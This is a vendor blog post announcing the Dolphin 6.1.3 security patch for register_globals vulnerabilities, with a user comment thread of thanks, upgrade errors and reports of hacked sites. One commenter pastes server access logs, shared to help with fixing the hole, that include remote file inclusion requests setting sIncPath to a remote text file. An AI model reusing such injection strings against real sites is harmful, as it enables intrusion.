Visit BoonEx Page at Facebook

Facebook

Join BoonEx group at LinkedIn

LinkedIn

Follow BoonEx on Twitter

Twitter

Subscribe to BoonEx Blog RSS feed

RSS
VictorT

IMPORTANT. Dolphin 6.1.3 Security Patch Release

The Dolphin 6.1.3 Security patch is released. This patch fixes vulnerabilities when the PHP setting "register_globals" is on.

Hence, it covers much code re-work overall. This patch should be applied only to 6.1.2 (no earlier versions) to move to 6.1.3 using these instructions. You are recommended to apply it, even though you have applied solutions provided by other members here, as this is more comprehensive.

For those who are taking steps by upgrading from earlier versions up to the latest release above, please make sure that "register_globals" is set to OFF on your host.

bad
24
good
 
 

Comments

LightWolf
LightWolf(positive) 351 days agocomment permalink
 
Awesome work Victor, thanks to all who created this wonderful software. I am installing the new dolphin as we speak. Hope this stops most of those mean hackers..urghhh
 
bad
1
good
 
View 1 replies to this comment
 
jerry79
jerry79(positive) 351 days agocomment permalink
 
Thanks Victor! But could you support a Dif of the files? Cause my site is heavily moded, so i have to know what is changed to the original once.
Or maybe i dont have to use this, cause my registerd_globals are setted to off, this means i dont need it, right?

Cheers,
Jerry
 
bad
1
good
 
View 2 replies to this comment
 
sammie
sammie(positive) 351 days agocomment permalink
 
Works like a charm, glad to see some of the bugs fixed too thank you team boonex i know you worked hard to get this done as quickly as possible. and it was a huge job.

just to clarify, although this patch makes it safer for dolphin site on hosts with register globals on. boonex still recommend, (as it is much safer all round) to choose a host with register globals off.
 
bad
0
good
 
 
Dwain
Dwain(positive) 351 days agocomment permalink
 
Thanks Victor,

That was quick easy and painless... now let's see what the hackers do to counter.
 
bad
0
good
 
 
realmasterd
realmasterd 351 days agocomment permalink
 
hello VictorT,

many thanks from germany!
 
bad
0
good
 
 
TheGateKeeper
TheGateKeeper(positive) 351 days agocomment permalink
 
I thank you also Victor for your efforts on behalf of us all
 
bad
0
good
 
 
Tango
Tango 351 days agocomment permalink
 
Big thanks for the patch....

On another but related subject... I checked my 'cache' folder and found a sub-folder named "PPP" which contains two "acct.php" and "index.html" files.

Are these normal? I have tried to download a copy and delete the files from my server but i can't do it.

Also, I have deleted the files under the 'cache' folder" just for my own security measure. is this OK.

Please advise.
 
bad
0
good
 
View 4 replies to this comment
 
hakknslash
hakknslash 351 days agocomment permalink
 
I get the following error when I try to compile the ORCA language file. (I changed EVERY file and folder in ORCA to 777 and still get this message)

Warning: fopen(/MYSITE/orca/conf/params.conf): failed to open stream: Permission denied in /MYSITE/orca/inc/util.inc.php on line 263

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 36

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 37

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 38

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/inc/util.inc.php on line 39

Warning: Cannot modify header information - headers already sent by (output started at /MYSITE/orca/inc/util.inc.php:263) in /MYSITE/orca/classes/en/BxXslTransform.php on line 61
 
bad
0
good
 
View 4 replies to this comment
 
killerhaai
killerhaai(positive) 351 days agocomment permalink
 
I got the same errors as first writer... and deleting the the file you advized has not effect...
 
bad
0
good
 
View 2 replies to this comment
 
avhow
avhow 351 days agocomment permalink
 
Thanks for the patch. Can I also suggest you stop promoting Host For Web since they have register globals on by default.
 
bad
1
good
 
View 2 replies to this comment
 
jamesbowie
jamesbowie 351 days agocomment permalink
 
Can you tell me where I can fin d the security patch please. I cannot find the link anywhere.
 
bad
0
good
 
View 1 replies to this comment
 
avhow
avhow 351 days agocomment permalink
 
Its in the top blog post. They are calling it an upgrade from 6.1.2 to 6.1.3. It seems if you run an earlier version you arent covered. For security reasons they recommend you have the latest version.
 
bad
0
good
 
 
killerhaai
killerhaai 351 days agocomment permalink
 
Oke now get strange things... I can't login to my own admin center after the patch, not only the same errors like Hakknslash, but also to admin login. I fill in my data and it say's "wating" and returns to index.php login.

I use firefox 3... Dolphin updated from 6.1.2 to 6.1.3 before the patch no problems...
 
bad
0
good
 
View 4 replies to this comment
 
theguypc
theguypc(positive) 350 days agocomment permalink
 
Thank you!
 
bad
1
good
 
 
Synergy
Synergy(positive) 350 days agocomment permalink
 
Thanks for the patch.
 
bad
0
good
 
 
Stuart038
Stuart038(negative) 350 days agocomment permalink
 
I am getting this:

Warning: require_once(BX_DIRECTORY_PATH_INCprofiles.inc.php) [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/admin/index.php on line 26

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_INCprofiles.inc.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/admin/index.php on line 26

And this under Orca

Warning: require_once(BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php) [function.require-once]: failed to open stream: No such file or directory in /home/connect/public_html/groups/orca/xml/config.php on line 89

Fatal error: require_once() [function.require]: Failed opening required 'BX_DIRECTORY_PATH_ROOTgroups/orca/layout/uni/params.php' (include_path='.:/usr/lib/php:/usr/local/lib/php') in /home/connect/public_html/groups/orca/xml/config.php on line 89

Help!

Stuart
 
bad
0
good
 
View 1 replies to this comment
 
Stuart038
Stuart038(negative) 350 days agocomment permalink
 
and I cannot access Admin

Help!

Stuart
 
bad
0
good
 
 
Evandromar
Evandromar 350 days agocomment permalink
 
Hello, personnel boonex, I update my dolphin to 6.1.3, even taking register_globals, off? I have doubts!
 
bad
0
good
 
View 1 replies to this comment
 
theGhost
theGhost(positive) 350 days agocomment permalink
 
Thanks for the patch Victor.

I built a brand new Dolphin upgraded all the way from 6.1.1 to 6.1.3 had no problems. Forgot to update the header.inc.php and guess what error I got :) Updated language files no problem. I am currently running RG_off.

When I did the upgrade on GGsite all went fine but I am still being punched :) IT DID tweek the attack thou...I'll send you the Log File. Still No Infections!
 
bad
0
good
 
View 1 replies to this comment
 
coolbuddy
coolbuddy 350 days agocomment permalink
 
do we need to apply this patch even if we download the latest version today and start a fresh website ?
 
bad
0
good
 
View 1 replies to this comment
 
Stuart038
Stuart038 350 days agocomment permalink
 
Hello AndreyP

files are:
define('BX_DIRECTORY_PATH_INC', $dir['inc']);
define('BX_DIRECTORY_PATH_ROOT', $dir['root']);
define('BX_DIRECTORY_PATH_BASE', $dir['base']);
define('BX_DIRECTORY_PATH_CACHE', $dir['cache']);
define('BX_DIRECTORY_PATH_CLASSES', $dir['classes']);
define('BX_DIRECTORY_PATH_PLUGINS', $dir['plugins']);

Stuart
 
bad
0
good
 
 
Stuart038
Stuart038(positive) 350 days agocomment permalink
 
Ok, problem solved!!

Stuart
 
bad
0
good
 
View 1 replies to this comment
 
Stuart038
Stuart038 350 days agocomment permalink
 
I forgot to upload the modified inc/headerinc.php file!!
 
bad
1
good
 
 
gameutopia
gameutopia(positive) 350 days agocomment permalink
 
Thanks for the patch and update guys!! Just a thought though not everyone reads the blogs or has email notifications. If a security update is involved you might think about or consider other ways to push it to people. I've emailed a few people and they were not even aware of counting this patch the last 2 or further.

I am glad I do follow these blogs. Thanks for the updates!!
 
bad
1
good
 
 
avhow
avhow(negative) 350 days agocomment permalink
 
The upgrades have busted my Orca css again so all my line breaks have gone in all my Orca Forum posts! Man this is FRUSTRATING! Sometimes feel like I'm banging my head against a wall.
 
bad
0
good
 
 
Nighto2007
Nighto2007 350 days agocomment permalink
 
thanks Victor

it's great ... I upgraded my site successfully

my site work fine

best regards
Rawaf
http://www.a7lakalam.com
 
bad
0
good
 
 
shaneed
shaneed 350 days agocomment permalink
 
If my register globals are OFF, do i have to appy for this patch???
 
bad
0
good
 
View 1 replies to this comment
 
Juker
Juker(positive) 350 days agocomment permalink
 
Thanks Victor and the Boonex team,

Am I the only one or can we all sense the entire community coming together because of this problem? I am really proud to be a part of this movement.

Kudos to DosDawg who has been working tirelessly in the forums to help as many as he can.

Juker
 
bad
0
good
 
 
crswsystem
crswsystem(positive) 350 days agocomment permalink
 
Hello Victor, I think the Patsch toll, although we do not need this Patsch, but I think that many users use the Web space is difficult and have their server right to use, very helpful.
 
bad
0
good
 
 
womenscafe
womenscafe(positive) 347 days agocomment permalink
 
I'm computer illiterate so Joombyte is doing the upgrade for me! Yipee!
 
bad
0
good
 
 
Charisma
Charisma 347 days agocomment permalink
 
Does this fix the problem with the v6.12 RSS Feeds not working?
as far as I can tell it was something altered in the database.

I upgraded to 6.12 and my RSS feeds stopped working, does the 6.13 patch look at this problem?
 
bad
0
good
 
 
Rob1960
Rob1960 347 days agocomment permalink
 
Hackers can leave files and folders behind that are almost impossible to delete. If you suspect these files, work with technical support of the ISP to get rid of these.
 
bad
0
good
 
 
srisree
srisree(positive) 347 days agocomment permalink
 
Thanks
 
bad
0
good
 
 
Rob1960
Rob1960 346 days agocomment permalink
 
I noticed that the Patch.zip file does not include a modified .htaccess file, nor is there a php.ini file to set register_globals off at the directory level. My provider says I must set register_globals off locally using a php.ini file. In terms of syntax, some have said using register_globals = 0 and others say register_globals = off. Also, others have suggested modifications to the .htaccess file. Could someone post a modified .htaccess file that works form them, and if anyone needs to use the php.ini method for setting register_globals off, could they post a version of this file? Thanks very much.
 
bad
0
good
 
 
anydude
anydude 346 days agocomment permalink
 
I'm pretty new here and I've added few mods to my site. I've not applied any patches by myself so far. Would these patches overwrite those mods which I've installed?
 
bad
0
good
 
View 1 replies to this comment
 
jdoedtman
jdoedtman(negative) 346 days agocomment permalink
 
Dolphin Dates on Blogs, RSS feeds & Events: I've applied the patch to 6.1.3 and now all of the dates on my postings are wrong. For example, Events show a date of "_day_of_9" when I check the date is correctly set to 1 Sept 2008 and the same for Blog postings. RSS feeds show a date for the posts of "NaN".

Any ideas on how to fix this?

joe
 
bad
0
good
 
 
cheluskin
cheluskin 346 days agocomment permalink
 
Ага и отсутствующие ?> как минимум в двух файлах пофиксили . Да и ещё много чего . Вот только как бы узнать что именно было добавлено или удалено из движка . Где можно увидеть историю изменений .

P.S. говорить про безопасность в контекте этого движка не уместно моё ИМХО
 
bad
0
good
 
 
JacKsoN
JacKsoN 344 days agocomment permalink
 
I make this update, but i have one probleme whit Ray suite wich can't load , when i clicked on ray application i have a error message : " LOADING ERROR"
Before this update everything works good.

If anyone have an idea ?
 
bad
0
good
 
 
gregorscharff
gregorscharff 344 days agocomment permalink
 
Dear VictorT

i am happy you realesed this one also we are hacked also, i know we are a small community of artists (just70 activ) but we invite only artist who we think to come over the huge wave of artists around the world and we want to share and to show art . i was soo tired to reintegrate all the moduls and maybe in the future you will really check up the stuff of expertzzz home to be shure the customers of your script run not in a knife of again and again to "reinstall" all there stuff who they payed with money . your script is great and i love it total but to rebuild our site i will wait because i want to be shure we did not run again in this "black hole" of "reinstall" .
my thoughts to you and i know many is happend here in your little world called boonex but if you are a human with humans you will know what it means to say "to stay and keep cool"
kind regards

Gregor Scharff
founder and CEO of Digital Renaissances Network
& a artist with the pur power of art
 
bad
0
good
 
 
gregorscharff
gregorscharff 344 days agocomment permalink
 
Dear VictorT

i am happy you realesed this one also we are hacked also, i know we are a small community of artists (just70 activ) but we invite only artist who we think to come over the huge wave of artists around the world and we want to share and to show art . i was soo tired to reintegrate all the moduls and maybe in the future you will really check up the stuff of expertzzz home to be shure the customers of your script run not in a knife of again and again to "reinstall" all there stuff who they payed with money . your script is great and i love it total but to rebuild our site i will wait because i want to be shure we did not run again in this "black hole" of "reinstall" .
my thoughts to you and i know many is happend here in your little world called boonex but if you are a human with humans you will know what it means to say "to stay and keep cool"
kind regards

Gregor Scharff
founder and CEO of Digital Renaissances Network
& a artist with the pur power of art

PS: maybe you found a way like moduls to create who can installed and uninstalled from the admin interface it will be so helpful for the intigrate of new options or a package for the new stuff who can be removed easyly if it makes problems . :) take care and all the best to you and your team who was always helpful for shure !!!!!!!!!!!!!
 
bad
0
good
 
 
gregorscharff
gregorscharff 344 days agocomment permalink
 
a note again : please check the RMS(not ray) system because i think we got from there a attack who works well in our system (vserver)
 
bad
0
good
 
 
LightWolf
LightWolf 344 days agocomment permalink
 
I am having issues with the chat in the new dolphin release. Dolphin-v.6.1.3-Free All widgets work except the chat,it just continues to load but nothing happens. I have installed 2 times and get same thing. I also tried using the chat from 6.1.2 and a separate ray install, and that did not work. Is this just my issue or is it a dolphin issue? Should i wait for dolphin 6.2
 
bad
0
good
 
 
gregorscharff
gregorscharff 343 days agocomment permalink
 
mayby you take a look at the guestbook.php someone trys nowalways to enter it :

Fri Jul 25 06:13:15 2008] [error] [client 195.58.3.163] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add
[Fri Jul 25 06:13:16 2008] [error] [client 89.149.242.88] File does not exist: /srv/www/vhosts/digital-renaicances.org/httpdocs/community, referer: http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add

with diffrent IPs

kind regards

gregor
 
bad
0
good
 
 
gregorscharff
gregorscharff 343 days agocomment permalink
 
and this is the access log from our server but we installed now all new ( just the os system not more) :

195.58.3.163 - - [25/Jul/2008:06:13:15 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
89.149.242.88 - - [25/Jul/2008:06:13:16 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
90.157.115.140 - - [25/Jul/2008:06:19:18 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.0" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
64.182.159.1 - - [25/Jul/2008:06:19:34 +0200] "POST /community/guestbook.php?owner=100005 HTTP/1.1" 404 1351 "http://www.digital-renaissances.org/community/guestbook.php?owner=100005&action=show_add" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1)"
216.206.238.35 - - [25/Jul/2008:06:20:51 +0200] "GET /?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 200 7137 "-" "libwww-perl/5.803"
216.206.238.35 - - [25/Jul/2008:06:21:25 +0200] "GET /community/?sIncPath=http://www.doxgroup.com/egroupware/did.txt%0D?? HTTP/1.1" 404 1086 "-" "libwww-perl/5.803"
66.249.66.66 - - [25/Jul/2008:06:24:08 +0200] "GET /community/ray/ HTTP/1.1" 404 1086 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"

he/she trys to enter hahahah

hope it helps for fixing
 
bad
0
good
 
 
bss1
bss1 340 days agocomment permalink
 
On trying to compile Orca lanuage I am getting error "Language files compilation have been failed. Please check folders permissions."

All level 1 folders under /orca/ are set to 777.

Same problem with /groups/orca/

Can someone please guide on solving this issue.
 
bad
0
good
 
 
AGForknowledge
AGForknowledge 331 days agocomment permalink
 
I just uploaded the patch and now I go the the index page I get this error:

Warning: Division by zero in /mysite.com/templates/base/scripts/BxBaseIndex.php on line 445
Error Database query error

This is line 445 ---> $pages = ceil( $num / $max_num );

Any ideas? Thanks for all you guys do!!
 
bad
0
good
 
 
Juker
Juker 330 days agocomment permalink
 
My Site Is Being Hacked!

BEWARE - The patches do not work AND THE PROBLEM is not fixed!

I have 70 active members and on (8/3/08) Sunday night 10 members disappeared, on Monday night another 10 members disappeared, on Tuesday I began rebuilding and added 12 new members for a total of 62 and on Tuesday night 25 members disappeared. On Wednesday I removed all of the members except nine from my website and this morning (Thursday) one of the nine is missing.

I installed patch 6.1.3 with no error messages but when I installed the patch 6.1.4 I tried to recompile the language files but for /groups/orca or for /orca I get a "Failure To Recompile" error message and I can no longer recompile languages.

Can anyone help with the virus attack? The Dolphin patches are ineffective.

Thanks
 
bad
0
good
 
View 1 replies to this comment
 
Juker
Juker 330 days agocomment permalink
 
Attention Boonex Community - Hacker Alert!

No Password on your site is safe. My member passwords are being bypassed and all membership information is being systematically deleted. I have temporarily changed the status of my remaining existing members to unconfirmed and the hacker cannot see them. Change your memberships to unconfirmed until this hacker attack is eliminated.

I want to give the Boonex team the benefit of the doubt. I think they are working hard to beat down these hackers and my problem may be a new problem not covered by the patches.

Juker
 
bad
0
good
 
 
beatlemanu
beatlemanu 316 days agocomment permalink
 
Has this problem been solved yet?
 
bad
0
good
 
 
Profesize
Profesize 301 days agocomment permalink
 
Juker's problem sounds more like database pruning and not a virus.

Go to the Admin panel>Settings>Database pruning>Clean old profiles by last log in ( days ) and set it to something like 3000 otherwise it will delete your older profiles automatically.

Hope that helps.


Prof.
 
bad
0
good
 
 


Post a Comment

Please login to post a comment.

This Post
 
 
VictorT Blog
All Blogs
Found a bug? Have a suggestion? We really value your feedback!
 
PET:7.13943386078